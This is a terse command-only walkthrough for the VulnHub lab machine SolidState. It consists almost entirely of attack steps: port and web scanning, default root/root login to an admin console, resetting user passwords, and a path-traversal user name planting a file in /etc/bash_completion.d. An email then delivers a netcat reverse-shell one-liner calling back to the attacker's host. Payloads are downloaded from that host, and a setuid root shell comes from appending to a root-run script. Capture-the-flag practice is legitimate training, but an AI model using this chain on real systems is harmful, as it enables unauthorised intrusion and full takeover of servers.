VulnHub: SOLIDSTATE: 1

  1. Network Discovery
nmap -Pn 10.0.2.25
nmap -Pn -p1000- 10.0.2.25
nmap -A -p22,25,80,110,119,4555 10.0.2.25
nmap --script vuln -p22,25,80,110,119,4555 10.0.2.25
nikto -h http://10.0.2.25
gobuster dir --wordlist /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt -u http://10.0.2.25/ -x php,txt,html,sh,cgi -q
telnet 10.0.2.25 4555
Username: root
Password: root
HELP
listusers
setpassword <username> 1234
ssh mindy@10.0.2.25
ls -la
cat user.txt
cd ..
cat /etc/passwd
adduser ../../../../../../../../etc/bash_completion.d password
rlwrap nc -lvp 443
telnet 10.0.2.25 25
EHLO bla.bla
MAIL FROM: <'you@domain.com>
RCPT TO: <../../../../../../../../etc/bash_completion.d>
DATA
From: bla.bla
'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.2.27 443 >/tmp/f.
ssh mindy@10.0.2.25
whoami
python -c 'import pty;pty.spawn("/bin/bash");'
python -m SimpleHTTPServer 80
cd /tmp
wget http://10.0.2.27/LinEnum.sh
chmod 777 LinEnum.sh
/tmp/LinEnum.sh -t
sudo -l
getcap -r / 2>/dev/null
ps aux | grep "^root"
wget http://10.0.2.27/pspy32
chmod 777 pspy32
/tmp/pspy32
cd /opt
cat tmp.py
echo 'os.system("cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash")' >> tmp.py
cat tmp.py
cd /tmp
ls -la
/tmp/rootbash -p
whoami
cd /root
ls -la
cat root.txt
